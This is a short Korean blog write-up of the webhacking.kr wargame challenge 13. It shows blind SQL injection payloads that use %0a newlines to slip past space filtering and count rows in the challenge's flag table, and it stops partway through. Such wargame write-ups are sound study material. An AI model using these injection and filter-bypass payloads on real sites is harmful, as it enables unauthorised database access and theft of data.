13번
-
webhacking.kr 13번 [1000p]$ 웹 해킹 $/webhacking.kr 2019. 4. 9. 23:56
1을 제출해 보겠습니다. 0을 제출해 보겠습니다. 1은 참이고, 0은 거짓이기 때문에 참일때 result 1 이 나오고 거짓일때 result값이 안나옵니다. 다음 sql구문으로 flag의 개수를 알수 있습니다. if(select count(flag) from prob13password in 1,1,0) ?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in1,1,0) 다음과 같이 입력해 보면… Flag가 1개가 아닙니다.. if(select count(flag) from prob13password in 2,1,0) ?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in%0a(2),1,0) 를 넣어 봤습니다..